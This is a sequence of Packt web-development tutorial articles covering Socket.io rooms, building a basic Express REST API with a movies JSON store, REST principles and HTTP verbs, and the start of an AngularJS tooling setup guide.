As you can see, you can use multiple namespaces in the same application without much effort. However, once sockets are connected to different namespaces, you will not be able to send an event to all these namespaces at once. This means that namespaces are not very good for a more dynamic grouping logic. For this purpose, Socket.io offers a different feature called rooms.

Socket.io rooms

Socket.io rooms allow you to partition connected sockets into different groups in a dynamic way. Connected sockets can join and leave rooms, and Socket.io provides you with a clean interface to manage rooms and emit events to the subset of sockets in a room. The rooms functionality is handled solely on the socket server but can easily be exposed to the socket client.

Joining and leaving rooms

Joining a room is handled using the socket join() method, while leaving a room is handled using the leave() method. So, a simple subscription mechanism can be implemented as follows:

```javascript
io.on('connection', function(socket) {
  socket.on('join', function(roomData) {
    socket.join(roomData.roomName);
  });
  socket.on('leave', function(roomData) {
    socket.leave(roomData.roomName);
  });
});
```

Notice that the join() and leave() methods both take the room name as the first argument.

Emitting events to rooms

To emit events to all the sockets in a room, you will need to use the in() method. So, emitting an event to all socket clients who joined a room is quite simple and can be achieved with the help of the following code snippet:

```javascript
io.on('connection', function(socket){
  io.in('someRoom').emit('customEvent', customEventData);
});
```

Another option is to send the event to all connected socket clients in a room except the sender by using the broadcast property and the to() method:

```javascript
io.on('connection', function(socket){
  socket.broadcast.to('someRoom').emit('customEvent', customEventData);
});
```
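Combining joins with room broadcasts, a minimal room-based chat sketch might look like this (the join and roomMessage event names and payload shapes are assumptions for illustration):

```javascript
io.on('connection', function(socket) {
  socket.on('join', function(roomData) {
    socket.join(roomData.roomName);
    // announce the new subscriber to everyone already in the room
    socket.broadcast.to(roomData.roomName)
      .emit('roomMessage', 'a new user joined ' + roomData.roomName);
  });
  socket.on('roomMessage', function(messageData) {
    // relay the message only to sockets subscribed to that room
    socket.broadcast.to(messageData.roomName)
      .emit('roomMessage', messageData.text);
  });
});
```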
This pretty much covers the simple yet powerful room functionality of Socket.io. In the next section, you will learn how to implement Socket.io in your MEAN application and, more importantly, how to use the Passport session to identify users in the Socket.io session. While we covered most of Socket.io's features, you can learn more about Socket.io by visiting the official project page at https://socket.io.

Summary

In this article, you learned how the Socket.io module works. You went over the key features of Socket.io and learned how the server and client communicate. You configured your Socket.io server and learned how to integrate it with your Express application. You also used the Socket.io handshake configuration to integrate the Passport session. In the end, you built a fully functional chat example and learned how to wrap the Socket.io client with an AngularJS service.

Resources for Article:

Further resources on this subject:
- Creating a RESTful API [article]
- Angular Zen [article]
- Digging into the Architecture [article]
Creating a RESTful API

In this article by Jason Krol, the author of Web Development with MongoDB and NodeJS, we will review the following topics:
- Introducing RESTful APIs
- Installing a few basic tools
- Creating a basic API server and sample JSON data
- Responding to GET requests
- Updating data with POST and PUT
- Removing data with DELETE
- Consuming external APIs from Node

What is an API?

An Application Programming Interface (API) is a set of tools that a computer system makes available to give unrelated systems or software the ability to interact with each other. Typically, a developer uses an API when writing software that will interact with a closed, external software system. The external software system provides the API as a standard set of tools that all developers can use. Many popular social networking sites provide developers with access to APIs to build tools that support those sites. The most obvious examples are Facebook and Twitter. Both have a robust API that provides developers with the ability to build plugins and work with data directly, without being granted full access, as a general security precaution.

As you will see in this article, providing your own API is not only fairly simple, but it also empowers you to provide your users with access to your data. You also have the added peace of mind of knowing that you are in complete control over what level of access you grant, which sets of data you make read-only, and which data can be inserted and updated.

What is a RESTful API?

Representational State Transfer (REST) is a fancy way of saying CRUD over HTTP. When you use a REST API, you have a uniform means to create, read, and update data using simple HTTP URLs with a standard set of HTTP verbs. The most basic form of a REST API will accept one of the HTTP verbs at a URL and return some kind of data as a response.

Typically, a REST API GET request will always return some kind of data such as JSON, XML, HTML, or plain text. A POST or PUT request to a RESTful API URL will accept data to create or update. The URL for a RESTful API is known as an endpoint, and while working with these endpoints, it is typically said that you are consuming them. The standard HTTP verbs used while interfacing with REST APIs include:
- GET: This retrieves data
- POST: This submits data for a new record
- PUT: This submits data to update an existing record
- PATCH: This submits data to update only specific parts of an existing record
- DELETE: This deletes a specific record

Typically, RESTful API endpoints are defined in a way that mimics the data models and uses semantic URLs that are somewhat representative of the data models. This means that to request a list of models, for example, you would access an API endpoint of /models. Likewise, to retrieve a specific model by its ID, you would include that in the endpoint URL via /models/:Id.
Some sample RESTful API endpoint URLs are as follows:
- GET http://myapi.com/v1/accounts: This returns a list of accounts
- GET http://myapi.com/v1/accounts/1: This returns a single account by Id: 1
- POST http://myapi.com/v1/accounts: This creates a new account (data submitted as a part of the request)
- PUT http://myapi.com/v1/accounts/1: This updates an existing account by Id: 1 (data submitted as part of the request)
- GET http://myapi.com/v1/accounts/1/orders: This returns a list of orders for account Id: 1
- GET http://myapi.com/v1/accounts/1/orders/21345: This returns the details for a single order by Order Id: 21345 for account Id: 1

It's not a requirement that the URL endpoints match this pattern; it's just common convention.

Introducing Postman REST Client

Before we get started, there are a few tools that will make life much easier when you're working directly with APIs. The first of these tools is called Postman REST Client, and it's a Google Chrome application that can run right in your browser or as a standalone packaged application. Using this tool, you can easily make any kind of request to any endpoint you want. The tool provides many useful and powerful features that are very easy to use and, best of all, free!

Installation instructions

Postman REST Client can be installed in two different ways, but both require Google Chrome to be installed and running on your system. The easiest way to install the application is by visiting the Chrome Web Store at https://chrome.google.com/webstore/category/apps. Perform a search for Postman REST Client and multiple results will be returned. There is the regular Postman REST Client that runs as an application built into your browser, and a separate Postman REST Client (packaged app) that runs as a standalone application on your system in its own dedicated window. Go ahead and install your preference. If you install the application as the standalone packaged app, an icon to launch it will be added to your dock or taskbar. If you installed it as a regular browser app, you can launch it by opening a new tab in Google Chrome, going to Apps, and finding the Postman REST Client icon. After you've installed and launched the app, you should be presented with an output similar to the following screenshot:
Here is a sample API endpoint I submitted a GET request to that returns the JSON data in its response: A really nice thing about making API calls to endpoints that return JSON using Postman Client is that it parses and displays the JSON in a very nicely formatted way, and each node in the data is expandable and collapsible. The app is very intuitive so make sure you spend some time playing around and experimenting with different types of calls to different URLs. Using the JSONView Chrome extension There is one other tool I want to let you know about (while extremely minor) that is actually a really big deal. The JSONView Chrome extension is a very small plugin that will instantly convert any JSON you view directly via the browser into a more usable JSON tree (exactly like Postman Client). Here is an example of pointing to a URL that returns JSON from Chrome before JSONView is installed: And here is that same URL after JSONView has been installed: You should install the JSONView Google Chrome extension the same way you installed Postman REST Client—access the Chrome Web Store and perform a search for JSONView. Now that you have the tools to be able to easily work with and test API endpoints, let's take a look at writing your own and handling the different request types. Creating a Basic API server Let's create a super basic Node.js server using Express that we'll use to create our own API. Then, we can send tests to the API using Postman REST Client to see how it all works. In a new project workspace, first install the npm modules that we're going to need in order to get our server up and running: $ npm init $ npm install --save express body-parser underscore Now that the package.json file for this project has been initialized and the modules installed, let's create a basic server file to bootstrap up an Express server. Create a file named server.js and insert the following block of code: var express = require('express'),    bodyParser = require('body-parser'),    _ = require('underscore'), json = require('./movies.json'),    app = express();   app.set('port', process.env.PORT || 3500);   app.use(bodyParser.urlencoded()); app.use(bodyParser.json());   var router = new express.Router(); // TO DO: Setup endpoints ... app.use('/', router);   var server = app.listen(app.get('port'), function() {    console.log('Server up: http://localhost:' + app.get('port')); }); Most of this should look familiar to you. In the server.js file, we are requiring the express, body-parser, and underscore modules. We're also requiring a file named movies.json, which we'll create next. After our modules are required, we set up the standard configuration for an Express server with the minimum amount of configuration needed to support an API server. Notice that we didn't set up Handlebars as a view-rendering engine because we aren't going to be rendering any HTML with this server, just pure JSON responses. 
Creating sample JSON data

Let's create the sample movies.json file that will act as our temporary data store (even though the API we build for the purposes of demonstration won't actually persist data beyond the app's life cycle):

```json
[{
    "Id": "1",
    "Title": "Aliens",
    "Director": "James Cameron",
    "Year": "1986",
    "Rating": "8.5"
}, {
    "Id": "2",
    "Title": "Big Trouble in Little China",
    "Director": "John Carpenter",
    "Year": "1986",
    "Rating": "7.3"
}, {
    "Id": "3",
    "Title": "Killer Klowns from Outer Space",
    "Director": "Stephen Chiodo",
    "Year": "1988",
    "Rating": "6.0"
}, {
    "Id": "4",
    "Title": "Heat",
    "Director": "Michael Mann",
    "Year": "1995",
    "Rating": "8.3"
}, {
    "Id": "5",
    "Title": "The Raid: Redemption",
    "Director": "Gareth Evans",
    "Year": "2011",
    "Rating": "7.6"
}]
```

This is just a really simple JSON list of a few of my favorite movies. Feel free to populate it with whatever you like. Boot up the server to make sure you aren't getting any errors (note that we haven't set up any routes yet, so it won't actually do anything if you try to load it via a browser):

```
$ node server.js
Server up: http://localhost:3500
```

Responding to GET requests

Adding simple GET request support is fairly simple, and you've seen this before already in the app we built. Here is some sample code that responds to a GET request and returns a simple JavaScript object as JSON. Insert the following code in the routes section where we have the // TO DO: Setup endpoints ... comment waiting:

```javascript
router.get('/test', function(req, res) {
    var data = {
        name: 'Jason Krol',
        website: 'http://kroltech.com'
    };

    res.json(data);
});
```

Let's tweak the function a little bit and change it so that it responds to a GET request against the root URL (that is, /) route and returns the JSON data from our movies file. Add this new route after the /test route added previously:

```javascript
router.get('/', function(req, res) {
    res.json(json);
});
```

The res (response) object in Express has a few different methods to send data back to the browser. Each of these ultimately falls back on the base send method, which includes header information, statusCodes, and so on. res.json and res.jsonp will automatically format JavaScript objects into JSON and then send them using res.send. res.render will render a template view as a string and then send it using res.send as well.

With that code in place, if we launch the server.js file, the server will be listening for a GET request to the / URL route and will respond with the JSON data of our movies collection. Let's first test it out using the Postman REST Client tool:

GET requests are nice because we could have just as easily pulled that same URL via our browser and received the same result:

However, we're going to use Postman for the remainder of our endpoint testing, as it's a little more difficult to send POST and PUT requests using a browser.

Receiving data – POST and PUT requests

When we want to allow users of our API to insert or update data, we need to accept a request from a different HTTP verb. When inserting new data, the POST verb is the preferred method to accept data and know it's for an insert. Let's take a look at code that accepts a POST request and data along with the request, inserts a record into our collection, and returns the updated JSON.
Insert the following block of code after the route you added previously for GET:

```javascript
router.post('/', function(req, res) {
    // insert the new item into the collection (validate first)
    if(req.body.Id && req.body.Title && req.body.Director && req.body.Year && req.body.Rating) {
        json.push(req.body);
        res.json(json);
    } else {
        res.json(500, { error: 'There was an error!' });
    }
});
```

You can see that the first thing we do in the POST function is check to make sure the required fields were submitted along with the actual request. Assuming our data checks out and all the required fields are accounted for (in our case, every field), we insert the entire req.body object into the array as-is using the array's push function. If any of the required fields aren't submitted with the request, we return a 500 error message instead. Let's submit a POST request this time to the same endpoint using the Postman REST Client. (Don't forget to make sure your API server is running with node server.js.)

First, we submitted a POST request with no data, so you can clearly see the 500 error response that was returned. Next, we provided the actual data using the x-www-form-urlencoded option in Postman and provided each of the name/value pairs with some new custom data. You can see from the results that the STATUS was 200, which is a success, and the updated JSON data was returned as a result. Reloading the main GET endpoint in a browser yields our original movies collection with the new one added.

PUT requests will work in almost exactly the same way except, traditionally, the Id property of the data is handled a little differently. In our example, we are going to require the Id attribute as a part of the URL and not accept it as a parameter in the data that's submitted (since it's usually not common for an update function to change the actual Id of the object it's updating). Insert the following code for the PUT route after the existing POST route you added earlier:

```javascript
router.put('/:id', function(req, res) {
    // update the item in the collection
    if(req.params.id && req.body.Title && req.body.Director && req.body.Year && req.body.Rating) {
        _.each(json, function(elem, index) {
            // find and update:
            if (elem.Id === req.params.id) {
                elem.Title = req.body.Title;
                elem.Director = req.body.Director;
                elem.Year = req.body.Year;
                elem.Rating = req.body.Rating;
            }
        });

        res.json(json);
    } else {
        res.json(500, { error: 'There was an error!' });
    }
});
```

This code again validates that the required fields are included with the data that was submitted along with the request. Then, it performs an _.each loop (using the underscore module) to look through the collection of movies and find the one whose Id parameter matches the Id included in the URL parameter. Assuming there's a match, the individual fields for that matched object are updated with the new values that were sent with the request. Once the loop is complete, the updated JSON data is sent back as the response. Similarly to the POST request, if any of the required fields are missing, a simple 500 error message is returned. The following screenshot demonstrates a successful PUT request updating an existing record.
The response from Postman after including the value 1 in the URL as the Id parameter, providing the individual fields to update as x-www-form-urlencoded values, and finally sending as PUT shows that the original item in our movies collection is now the original Alien (not Aliens, its sequel, as we originally had).

Removing data – DELETE

The final stop on our whirlwind tour of the different REST API HTTP verbs is DELETE. It should be no surprise that sending a DELETE request should do exactly what it sounds like. Let's add another route that accepts DELETE requests and will delete an item from our movies collection. Here is the code that takes care of DELETE requests; it should be placed after the existing block of code from the previous PUT:

```javascript
router.delete('/:id', function(req, res) {
    var indexToDel = -1;
    _.each(json, function(elem, index) {
        if (elem.Id === req.params.id) {
            indexToDel = index;
        }
    });
    if (~indexToDel) {
        json.splice(indexToDel, 1);
    }
    res.json(json);
});
```

This code will loop through the collection of movies and find a matching item by comparing the values of Id. If a match is found, the array index for the matched item is held until the loop is finished. Using the array.splice function, we can remove an array item at a specific index. Once the data has been updated by removing the requested item, the JSON data is returned. Notice in the following screenshot that the updated JSON that's returned is in fact no longer displaying the original second item we deleted.

Note that ~ in there! That's a little bit of JavaScript black magic! The tilde (~) in JavaScript will bit-flip a value. In other words, it takes a value and returns the negative of that value incremented by one, that is, ~n === -(n+1). Typically, the tilde is used with functions that return -1 as a false response. By using ~ on -1, you convert it to 0. If you were to perform a Boolean check on -1 in JavaScript, it would return true. You will see that ~ is used primarily with the indexOf function and jQuery's $.inArray(), both of which return -1 as a false response.
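A quick standalone illustration of the tilde trick described above (this snippet is not part of the API code):

```javascript
var list = ['a', 'b', 'c'];

if (~list.indexOf('b')) {    // indexOf returns 1; ~1 === -2, which is truthy
    console.log('found');
}

if (!~list.indexOf('z')) {   // indexOf returns -1; ~(-1) === 0, which is falsy
    console.log('not found');
}
```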
All of the endpoints defined in this article are extremely rudimentary, and most of them should never see the light of day in a production environment! Whenever you have an API that accepts anything other than GET requests, you need to be sure to enforce extremely strict validation and authentication rules. After all, you are basically giving your users direct access to your data.

Consuming external APIs from Node.js

There will undoubtedly be a time when you want to consume an API directly from within your Node.js code. Perhaps your own API endpoint needs to first fetch data from some other unrelated third-party API before sending a response. Whatever the reason, the act of sending a request to an external API endpoint and receiving a response can be done fairly easily using a popular and well-known npm module called Request. Request was written by Mikeal Rogers and is currently the third most popular (and most relied upon) npm module after async and underscore. Request is basically a super simple HTTP client, so everything you've been doing with Postman REST Client so far is basically what Request can do, only the resulting data is available to you in your Node code, as well as the response status codes and/or errors, if any.

Consuming an API endpoint using Request

Let's do a neat trick and actually consume our own endpoint as if it were some third-party external API. First, we need to ensure we have Request installed and can include it in our app:

```
$ npm install --save request
```

Next, edit server.js and make sure you include Request as a required module at the start of the file:

```javascript
var express = require('express'),
    bodyParser = require('body-parser'),
    _ = require('underscore'),
    json = require('./movies.json'),
    app = express(),
    request = require('request');
```

Now let's add a new endpoint after our existing routes, which will be accessible in our server via a GET request to /external-api. This endpoint, however, will actually consume another endpoint on another server; for the purposes of this example, that other server is actually the same server we're currently running!

The Request module accepts an options object with a number of different parameters and settings, but for this particular example, we only care about a few. We're going to pass an object that has a setting for the method (GET, POST, PUT, and so on) and the URL of the endpoint we want to consume. After the request is made and a response is received, we want an inline callback function to execute. Place the following block of code after your existing list of routes in server.js:

```javascript
router.get('/external-api', function(req, res) {
    request({
            method: 'GET',
            uri: 'http://localhost:' + (process.env.PORT || 3500),
        }, function(error, response, body) {
            if (error) { throw error; }

            var movies = [];
            _.each(JSON.parse(body), function(elem, index) {
                movies.push({
                    Title: elem.Title,
                    Rating: elem.Rating
                });
            });
            res.json(_.sortBy(movies, 'Rating').reverse());
        });
});
```

The callback function accepts three parameters: error, response, and body. The response object is like any other response that Express handles and has all of the various parameters as such. The third parameter, body, is what we're really interested in. That will contain the actual result of the request to the endpoint that we called. In this case, it is the JSON data from the main GET route we defined earlier, which returns our own list of movies. It's important to note that the data returned from the request is returned as a string. We need to use JSON.parse to convert that string to actual usable JSON data.

Using the data that came back from the request, we transform it a little bit; that is, we take that data and manipulate it to suit our needs. In this example, we took the master list of movies and returned a new collection that consists of only the title and rating of each movie, sorted by the top scores. Load this new endpoint by pointing your browser to http://localhost:3500/external-api, and you can see the new transformed JSON output to the screen.

Let's take a look at another example that's a little more real world. Let's say that we want to display a list of similar movies for each one in our collection, but we want to look up that data somewhere such as www.imdb.com. Here is the sample code that will send a GET request to IMDb's JSON API, specifically for the word aliens, and return a list of related movies by title and year.
Go ahead and place this block of code after the previous route for external-api:

```javascript
router.get('/imdb', function(req, res) {
    request({
            method: 'GET',
            uri: 'http://sg.media-imdb.com/suggests/a/aliens.json',
        }, function(err, response, body) {
            var data = body.substring(body.indexOf('(') + 1);
            data = JSON.parse(data.substring(0, data.length - 1));
            var related = [];
            _.each(data.d, function(movie, index) {
                related.push({
                    Title: movie.l,
                    Year: movie.y,
                    Poster: movie.i ? movie.i[0] : ''
                });
            });

            res.json(related);
        });
});
```

If we take a look at this new endpoint in a browser, we can see that the JSON data returned from our /imdb endpoint is actually itself retrieving and returning data from some other API endpoint:

Note that the JSON endpoint I'm using for IMDb isn't actually from their API, but rather what they use on their homepage when you type in the main search box. This would not really be the most appropriate way to use their data, but it's more of a hack to show this example. In reality, to use their API (like most other APIs), you would need to register and get an API key that you would use so that they can properly track how much data you are requesting on a daily or an hourly basis. Most APIs will require you to use a private key with them for this same reason.

Summary

In this article, we took a brief look at how APIs work in general and at the RESTful API approach to semantic URL paths and arguments, and we created a bare-bones API. We used Postman REST Client to interact with the API by consuming endpoints and testing the different types of request methods (GET, POST, PUT, and so on). You also learned how to consume an external API endpoint by using the third-party node module Request.

Resources for Article:

Further resources on this subject:
- RESTful Services JAX-RS 2.0 [Article]
- REST – Where It Begins [Article]
- RESTful Web Services – Server-Sent Events (SSE) [Article]
What is REST?

This article by Bhakti Mehta, the author of RESTful Java Patterns and Best Practices, starts with the basic concepts of REST, how to design RESTful services, and best practices around designing REST resources. It also covers the architectural aspects of REST.

Where REST has come from

The confluence of social networking, cloud computing, and the era of mobile applications has created a generation of emerging technologies that allow different networked devices to communicate with each other over the Internet. In the past, there were traditional and proprietary approaches for building solutions encompassing different devices and components communicating with each other over an unreliable network or through the Internet. Some of these approaches, such as RPC, CORBA, and SOAP-based web services, which evolved as different implementations of Service Oriented Architecture (SOA), required tighter coupling between components along with greater complexity in integration.

As the technology landscape evolves, today's applications are built on the notion of producing and consuming APIs instead of using web frameworks that invoke services and produce web pages. This requirement enforces the need for easier exchange of information between distributed services along with predictable, robust, well-defined interfaces. API-based architecture enables agile development, easier adoption and prevalence, and scale and integration with applications within and outside the enterprise.

HTTP 1.1 is defined in RFC 2616 and is ubiquitously used as the standard protocol for distributed, collaborative, hypermedia information systems. Representational State Transfer (REST) is inspired by HTTP and can be used wherever HTTP is used. The widespread adoption of REST and JSON opens up the possibility of applications incorporating and leveraging functionality from other applications as needed. The popularity of REST is mainly because it enables building lightweight, simple, cost-effective modular interfaces, which can be consumed by a variety of clients.

This article covers the following topics:
- Introduction to REST
- Safety and idempotence
- HTTP verbs and REST
- Best practices when designing RESTful services
- REST architectural components

Introduction to REST

REST is an architectural style that conforms to Web standards such as using HTTP verbs and URIs. It is bound by the following principles:
- All resources are identified by URIs
- All resources can have multiple representations
- All resources can be accessed/modified/created/deleted by standard HTTP methods
- There is no state on the server

REST is extensible due to the use of URIs for identifying resources. For example, a URI to represent a collection of book resources could look like this:

http://foo.api.com/v1/library/books

A URI to represent a single book identified by its ISBN could be as follows:

http://foo.api.com/v1/library/books/isbn/12345678

A URI to represent a coffee order resource could be as follows:

http://bar.api.com/v1/coffees/orders/1234

A user in a system can be represented like this:

http://some.api.com/v1/user

A URI to represent all the book orders for a user could be:

http://bar.api.com/v1/user/5034/book/orders

All the preceding samples show a clear, readable pattern, which can be interpreted by the client. All these resources could have multiple representations. The resource examples shown here can be represented by JSON or XML and can be manipulated by the HTTP methods GET, PUT, POST, and DELETE.
The following table summarizes the HTTP methods and descriptions for the actions taken on a resource, with a simple example of a collection of books in a library:

HTTP method | Resource URI | Description
GET | /library/books | Gets a list of books
GET | /library/books/isbn/12345678 | Gets a book identified by ISBN "12345678"
POST | /library/books | Creates a new book order
DELETE | /library/books/isbn/12345678 | Deletes a book identified by ISBN "12345678"
PUT | /library/books/isbn/12345678 | Updates a specific book identified by ISBN "12345678"
PATCH | /library/books/isbn/12345678 | Can be used to do a partial update for a book identified by ISBN "12345678"

REST and statelessness

REST is bound by the principle of statelessness. Each request from the client to the server must have all the details needed to understand the request. This helps to improve visibility, reliability, and scalability for requests:

Visibility is improved, as the system monitoring the requests does not have to look beyond one request to get details.
Reliability is improved, as there is no check-pointing/resuming to be done in case of partial failures.
Scalability is improved, as the number of requests that can be processed increases because the server is not responsible for storing any state.

Roy Fielding's dissertation on the REST architectural style provides details on the statelessness of REST; see http://www.ics.uci.edu/~fielding/pubs/dissertation/rest_arch_style.htm

With this initial introduction to the basics of REST, we shall cover the different maturity levels and where REST falls in them in the following section.

Richardson Maturity Model

The Richardson Maturity Model is a model developed by Leonard Richardson. It talks about the basics of REST in terms of resources, verbs, and hypermedia controls. The starting point for the maturity model is to use the HTTP layer as the transport.

Level 0 – Remote Procedure Invocation

This level contains SOAP or XML-RPC sending data as POX (Plain Old XML). Only POST methods are used. This is the most primitive way of building SOA applications, with a single POST method and XML used to communicate between services.

Level 1 – REST resources

This level uses POST methods and, instead of using a function and passing arguments, uses REST URIs. So it still uses only one HTTP method. It is better than Level 0 in that it breaks a complex functionality into multiple resources with one method.

Level 2 – more HTTP verbs

This level uses other HTTP verbs such as GET, HEAD, DELETE, and PUT along with POST methods. Level 2 is the real use case of REST, which advocates using different verbs based on the HTTP request methods, and the system can have multiple resources.

Level 3 – HATEOAS

Hypermedia as the Engine of Application State (HATEOAS) is the most mature level of Richardson's model. The responses to client requests contain hypermedia controls, which can help the client decide what action it can take next. Level 3 encourages easy discoverability and makes it easy for responses to be self-explanatory.
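As an illustration of Level 3, a response for a coffee order might carry links that tell the client what it can do next. This is a sketch; the link relations and JSON structure shown are assumptions for the example, not a format mandated by the model:

{
  "orderId": 1234,
  "status": "PREPARING",
  "links": [
    { "rel": "self", "href": "http://bar.api.com/v1/coffees/orders/1234" },
    { "rel": "cancel", "href": "http://bar.api.com/v1/coffees/orders/1234" }
  ]
}

A client that understands the rel values can discover the cancel action from the response itself instead of hardcoding the URI.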
Safety and Idempotence

This section discusses in detail what safe and idempotent methods are.

Safe methods

Safe methods are methods that do not change the state on the server. GET and HEAD are safe methods. For example, GET /v1/coffees/orders/1234 is a safe method. Safe methods can be cached. The PUT method is not safe, as it will create or modify a resource on the server. The POST method is not safe for the same reason. The DELETE method is not safe, as it deletes a resource on the server.

Idempotent methods

An idempotent method is a method that will produce the same result irrespective of how many times it is called. For example, the GET method is idempotent, as multiple calls to the GET resource will always return the same response. The PUT method is idempotent, as calling it multiple times will update the same resource and not change the outcome. POST is not idempotent, and calling the POST method multiple times can have different results and will result in creating new resources. DELETE is idempotent because once the resource is deleted, it is gone, and calling the method multiple times will not change the outcome.

HTTP verbs and REST

HTTP verbs inform the server what to do with the data sent as part of the URL.

GET

GET is the simplest verb of HTTP, which enables access to a resource. Whenever the client clicks a URL in the browser, it sends a GET request to the address specified by the URL. GET is safe and idempotent. GET requests are cached. Query parameters can be used in GET requests. For example, a simple GET request is as follows:

curl http://api.foo.com/v1/user/12345

POST

POST is used to create a resource. POST requests are neither idempotent nor safe. Multiple invocations of POST requests can create multiple resources. POST requests should invalidate a cache entry if it exists. Query parameters with POST requests are not encouraged. For example, a POST request to create a user can be:

curl -X POST -d '{"name":"John Doe","username":"jdoe","phone":"412-344-5644"}' http://api.foo.com/v1/user

PUT

PUT is used to update a resource. PUT is idempotent but not safe. Multiple invocations of PUT requests should produce the same results by updating the resource. PUT requests should invalidate the cache entry if it exists. For example, a PUT request to update a user can be:

curl -X PUT -d '{"phone":"413-344-5644"}' http://api.foo.com/v1/user

DELETE

DELETE is used to delete a resource. DELETE is idempotent but not safe. DELETE is idempotent because, according to RFC 2616, "the side effects of N > 0 requests is the same as for a single request". This means that once the resource is deleted, calling DELETE multiple times will get the same response. For example, a request to delete a user is as follows:

curl -X DELETE http://foo.api.com/v1/user/1234

HEAD

HEAD is similar to a GET request. The difference is that only the HTTP headers are returned and no content is returned. HEAD is idempotent and safe. For example, a request to send a HEAD request with curl is as follows:

curl -I http://foo.api.com/v1/user

It can be useful to send a HEAD request to see if the resource has changed before trying to get a large representation using a GET request.

PUT vs POST

According to the RFC, the difference between PUT and POST is in the Request URI. The URI identified by POST defines the entity that will handle the POST request. The URI in the PUT request includes the entity in the request. So POST /v1/coffees/orders means to create a new resource and return an identifier to describe the resource. In contrast, PUT /v1/coffees/orders/1234 means to update the resource identified by "1234" if it exists; otherwise, create a new order and use the URI orders/1234 to identify it.
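The curl calls above can equally be issued from JavaScript. The following is a minimal sketch using the fetch API against the same illustrative endpoints; it assumes a runtime where fetch is available (modern browsers or recent Node.js versions):

// GET - safe and idempotent
fetch("http://api.foo.com/v1/user/12345")
  .then(function (response) { return response.json(); })
  .then(function (user) { console.log(user); });

// POST - not idempotent: repeating it creates more resources
fetch("http://api.foo.com/v1/user", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ name: "John Doe", username: "jdoe", phone: "412-344-5644" })
});

// PUT - idempotent: repeating it leaves the resource in the same state
fetch("http://api.foo.com/v1/user", {
  method: "PUT",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ phone: "413-344-5644" })
});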
Best practices when designing resources

This section highlights some of the best practices when designing RESTful resources:

The API developer should use nouns to understand and navigate through resources, and verbs with the HTTP method. For example, the URI /user/1234/books is better than /user/1234/getBook.
Use associations in the URIs to identify subresources. For example, to get the authors for book 5678 for user 1234, use the following URI: /user/1234/books/5678/authors.
For specific variations, use query parameters. For example, to get all the books with 10 reviews, use /user/1234/books?reviews_counts=10.
Allow partial responses as part of query parameters if possible. An example of this case is to get only the name and age of a user; the client can specify ?fields as a query parameter listing the fields that should be sent by the server in the response, using the URI /users/1234?fields=name,age.
Have defaults for the output format of the response in case the client does not specify which format it is interested in. Most API developers choose to send JSON as the default response MIME type.
Use camelCase or _ for attribute names.
Support a standard API for counts, for example, users/1234/books/count, in the case of collections, so the client can get an idea of how many objects can be expected in the response. This will also help the client with pagination queries.
Support a pretty printing option, users/1234?pretty_print. Also, it is a good practice not to cache queries with the pretty print query parameter.
Avoid chattiness by being as verbose as possible in the response. This is because if the server does not provide enough details in the response, the client needs to make more calls to get additional details. That is a waste of network resources and counts against the client's rate limits.
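To make the partial-response idea concrete, here is a minimal sketch of how a server might honor the ?fields query parameter. It is written as an Express-style JavaScript handler purely for illustration; the article itself does not prescribe an implementation:

app.get('/users/:id', function (req, res) {
  // Hypothetical user record; in practice this would come from a data store
  var user = { name: 'John Doe', age: 42, phone: '412-344-5644' };
  if (req.query.fields) {
    var partial = {};
    // e.g. /users/1234?fields=name,age returns only name and age
    req.query.fields.split(',').forEach(function (field) {
      if (field in user) { partial[field] = user[field]; }
    });
    return res.json(partial);
  }
  res.json(user);
});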
REST architectural components

This section covers the various components that must be considered when building RESTful APIs.

REST services can be consumed from a variety of clients and applications running on different platforms and devices, such as mobile devices and web browsers. These requests are sent through a proxy server. The HTTP requests are sent to the resources and, based on the various CRUD operations, the right HTTP method is selected. On the response side, there can be pagination to ensure the server sends a subset of results. Also, the server can do asynchronous processing, thus improving responsiveness and scale. There can be links in the response, which deal with HATEOAS.

Here is a summary of the various REST architectural components:

HTTP requests use the REST API with HTTP verbs for the uniform interface constraint.
Content negotiation allows selecting a representation for a response when multiple representations are available.
Logging helps provide traceability to analyze and debug issues.
Exception handling allows sending application-specific exceptions with HTTP codes.
Authentication and authorization with OAuth 2.0 give other applications access control to take actions without the user having to send their credentials.
Validation provides support to send back detailed messages with error codes to the client, as well as validations for the inputs received in the request.
Rate limiting ensures the server is not burdened with too many requests from a single client.
Caching helps to improve application responsiveness.
Asynchronous processing enables the server to asynchronously send back responses to the client.
Microservices comprise breaking up a monolithic service into fine-grained services.
HATEOAS improves usability, understandability, and navigability by returning a list of links in the response.
Pagination allows clients to specify the items in a dataset that they are interested in.

These REST architectural components can be chained one after the other. For example, there can be a filter chain consisting of filters related to authentication, rate limiting, caching, and logging. This will take care of authenticating the user and checking whether the requests from the client are within rate limits; then a caching filter can check whether the request can be served from the cache. This can be followed by a logging filter, which can log the details of the request. For more details, check RESTful Java Patterns and Best Practices.
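To visualize that chaining, here is a minimal Express-style sketch of such a filter chain. The middleware names and bodies are hypothetical stubs for illustration, not an implementation from the book:

var express = require('express');
var app = express();

// Each filter does its work and calls next() to pass the request along the chain
function authenticate(req, res, next) { /* verify credentials */ next(); }
function rateLimit(req, res, next) { /* check the client's quota */ next(); }
function checkCache(req, res, next) { /* serve from cache if possible */ next(); }
function logRequest(req, res, next) { console.log(req.method, req.url); next(); }

app.use(authenticate);
app.use(rateLimit);
app.use(checkCache);
app.use(logRequest);

app.get('/v1/coffees/orders/:id', function (req, res) {
  res.json({ orderId: req.params.id, status: 'PREPARING' });
});

app.listen(3000);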


Setting Up The Rig

Packt
21 Aug 2014
16 min read
In this article by Vinci Rufus, the author of the book AngularJS Web Application Development Blueprints, we will see the process of setting up the various tools required to start building AngularJS apps. I'm sure you would have heard the saying, "A tool man is known by the tools he keeps." OK fine, I just made that up, but that's actually true, especially when it comes to programming. Sure, you can build complete and fully functional AngularJS apps just using a simple text editor and a browser, but if you want to work like a ninja, then make sure that you start using some of these tools as a part of your development workflow. Do note that these tools are not mandatory to build AngularJS apps. Their use is recommended mainly to help improve productivity.

In this article, we will see how to set up and use the following productivity tools:

Node.js
Grunt
Yeoman
Karma
Protractor

Since most of us are running a Mac, Windows, Ubuntu, or another flavor of the Linux operating system, we'll be covering the deployment steps common to all of them.

Setting up Node.js

Depending on your technology stack, I strongly recommend you have either Ruby or Node.js installed. In the case of AngularJS, most of the productivity tools or plugins are available through the Node Package Manager (npm), and, hence, we will be setting up Node.js along with npm. Node.js is an open source, JavaScript-based platform that uses an event-based input/output model, making it lightweight and fast.

